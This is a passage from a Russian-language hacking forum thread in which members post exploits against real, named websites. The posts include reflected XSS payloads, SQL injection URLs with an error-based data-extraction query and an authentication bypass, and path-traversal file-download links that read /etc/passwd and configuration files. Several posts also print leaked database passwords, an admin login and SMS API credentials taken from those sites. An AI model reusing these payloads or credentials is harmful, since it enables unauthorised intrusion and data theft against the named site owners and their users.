HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу Уязвимости SQLi, XSS и другие.
   
Ответ
Страница 15 из 35 « Первая < 5 11 12 13 14 15 16 17 18 19 25 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #141  
Старый 14.08.2015, 17:27
MDen1s
Guest
Сообщений: n/a
Провел на форуме:
3362

Репутация: 0
По умолчанию
XSS в поле поиска. Только не знаю какая:Reflected или DOM-based

http://voices.iit.edu/

alert('XSS')
 
Ответить с цитированием

  #142  
Старый 14.08.2015, 20:41
DDShadoww
Guest
Сообщений: n/a
Провел на форуме:
2236

Репутация: 2
По умолчанию
target:http://dazo.gov.ua

Type:XSS Reflected


Код HTML:
HTML:
http://dazo.gov.ua/index.php?id=">
 
Ответить с цитированием

  #143  
Старый 15.08.2015, 18:28
SaNDER
Guest
Сообщений: n/a
Провел на форуме:
51198

Репутация: 3
По умолчанию
target:https://dota2.net

Type:XSS Reflected

https://dota2.net/players/?st=">alert()

target:csgo.tm

Type:XSS Reflected

https://csgo.tm/support/

Описание : Переходим по линке и там где надо писать сообщение в саппорт пишем наш скрипт,я пишу ">alert(),дальше нажимаем создать тикет и вуаля(Нужно быть авторизованным в Steam . ) .
 
Ответить с цитированием

  #144  
Старый 16.08.2015, 17:24
hahanovB
Guest
Сообщений: n/a
Провел на форуме:
86887

Репутация: 2
По умолчанию
Target: http://www.mercerhotel.com/

Type: Arbitrary File Download

http://www.mercerhotel.com/forceDown.../../etc/passwd

www.mercerhotel.com/forceDownload.php?file=phpclasses/config.php

Код:
Code:
// $cfg['db']['host'] ="internal-db.s29207.gridserver.com";
// $cfg['db']['user'] ="db29207_hotelsab";
// $cfg['db']['password'] ="L'Tbh{))17";
// $cfg['db']['name']="db29207_mercerhotel";
 
Ответить с цитированием

  #145  
Старый 16.08.2015, 18:32
private_static
Guest
Сообщений: n/a
Провел на форуме:
25535

Репутация: 22
По умолчанию
Error Based SQL inject

Код:
Code:
http://hentai-x.ru/anime.php?id=3%20AND%20%28SELECT%201%20FROM%28SELECT%20COUNT%28*%29,CONCAT%28%28MID%28%28IFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29,0x20%29%29,1,50%29%29,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29lol%29
srv40129_ignilx@localhost
 
Ответить с цитированием

  #146  
Старый 16.08.2015, 20:53
hahanovB
Guest
Сообщений: n/a
Провел на форуме:
86887

Репутация: 2
По умолчанию
Type: Arbitrary File Download

Target: avalon-school.co.uk

Vulnerable: http://avalon-school.co.uk/forcedown.../wp-config.php

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]define[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'DB_NAME'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'avalon_school'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#FF8000"]/** MySQL database username */
[/COLOR][COLOR="#0000BB"]define[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'DB_USER'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'avalon-school'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#FF8000"]/** MySQL database password */
[/COLOR][COLOR="#0000BB"]define[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'DB_PASSWORD'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'WEB4374dnfjv'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#FF8000"]/** MySQL hostname */
[/COLOR][COLOR="#0000BB"]define[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'DB_HOST'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'localhost'[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR
Target: trackcars4hire.co.uk

Vulnerable: http://avalon-school.co.uk/forcedow.../../home/trackcars4hire/public_html/index.php

Target: tankers-r-us.co.uk

Vulnerable: http://avalon-school.co.uk/forcedow...../../home/tankers-r-us/public_html/index.php

Target: brighterchoices.co.uk

Vulnerable: http://avalon-school.co.uk/forcedow...../home/brighterchoices/public_html/index.php

Target: theknutsfordspa.co.uk

Vulnerable: http://avalon-school.co.uk/forcedow...../home/theknutsfordspa/public_html/index.php

Target: rhinoequipment.com.au

Vulnerable: http://avalon-school.co.uk/forcedow.../../home/rhinoequipment/public_html/index.php

Target: korusgroup.co.uk

Vulnerable: http://avalon-school.co.uk/forcedown...html/index.php

Target: dentalacademy.co.uk

Vulnerable: http://avalon-school.co.uk/forcedow.../../home/dentalacademy/public_html/index.html
 
Ответить с цитированием

  #147  
Старый 18.08.2015, 11:44
Pe4aJlb
Guest
Сообщений: n/a
Провел на форуме:
4765

Репутация: 20
По умолчанию
Код:
Code:
/#
Яндекс тИЦ 400 pr 5
 
Ответить с цитированием

  #148  
Старый 20.08.2015, 00:18
joelblack
Guest
Сообщений: n/a
Провел на форуме:
70303

Репутация: 145
По умолчанию
target: http://www.kt.kz

type: XSS Reflected

Код:
Code:
http://www.kt.kz/rus/search/?text=%22%3E%3Cscript%3Ealert%28%27Hello%27%29%3C%2Fscript%3E


target: http://www.yerkramas.org/advancedsearch

type: XSS Reflected

title:

Код:
Code:
">alert('Hello')
target: http://www.inet.az

type: XSS Reflected

Строка поиска:

Код:
Code:
">alert('Hello')
target: http://www.yenixeber.com

type: XSS Reflected

Строка поиска:

Код:
Code:
">alert('Hello')
target: https://stat.internet.su/

type:SQL Injection

Имя пользователя,Пароль:

Код:
Code:
' OR 'a'='a
 
Ответить с цитированием

  #149  
Старый 20.08.2015, 02:07
w0rm_
Guest
Сообщений: n/a
Провел на форуме:
4367

Репутация: 8
По умолчанию
[колор=рэд][сайз=млн]ЯНДЕКС ТИЦ 100500 !!!![/колор][/сайз]

Код:
Code:
_ttps://drive.google.com/file/d/0B0ox2xf_0TMjWVNHRWlBTU9sSWs/view
 
Ответить с цитированием

  #150  
Старый 20.08.2015, 17:14
hahanovB
Guest
Сообщений: n/a
Провел на форуме:
86887

Репутация: 2
По умолчанию
Type: Arbitrary File Download

Target: 14isppgconvention.com

Vulnerable: http://www.14isppgconvention.com/for...load.php?file=

1. http://www.14isppgconvention.com/for...dmin/index.php (GET)

Получаем:

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'REQUEST_METHOD'[/COLOR][COLOR="#007700"]]==[/COLOR][COLOR="#DD0000"]'POST'[/COLOR][COLOR="#007700"]){
if([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'username'[/COLOR][COLOR="#007700"]]==[/COLOR][COLOR="#DD0000"]'14isppg'[/COLOR][COLOR="#007700"]&&[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'password'[/COLOR][COLOR="#007700"]]==[/COLOR][COLOR="#DD0000"]'14isppg@admin'[/COLOR][COLOR="#007700"]){
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user'[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Location:home.php'[/COLOR][COLOR="#007700"]);
 exit;[/COLOR][/COLOR
Логин: 14isppg

Пароль: 14isppg@admin

2. Входим http://www.14isppgconvention.com/admin/

Получаем: http://www.14isppgconvention.com/adm...p?export=users

3. http://www.14isppgconvention.com/for...dmin/users.php (GET)

Находим:

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]mysql_connect[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"peterjacob82.powwebmysql.com"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"14isppg"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"14isppgS20"[/COLOR][COLOR="#007700"]) or die([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());

[/COLOR][COLOR="#0000BB"]mysql_select_db[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"14isppg"[/COLOR][COLOR="#007700"]) or die([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]())
[/COLOR][/COLOR
Находим:

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$FOO_USERNAME[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"39ispnc"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$FOO_PASSWORD[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"n0f5qkqjba"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$FOO_SENDERID[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"ISPPGM"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$FOO_PRIORITY[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"11"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$urltopost[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"http://bulksms.smslite.co.in/xmlapi.php"[/COLOR][COLOR="#007700"];
[/COLOR][/COLOR
 
Ответить с цитированием
Ответ
Страница 15 из 35 « Первая < 5 11 12 13 14 15 16 17 18 19 25 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ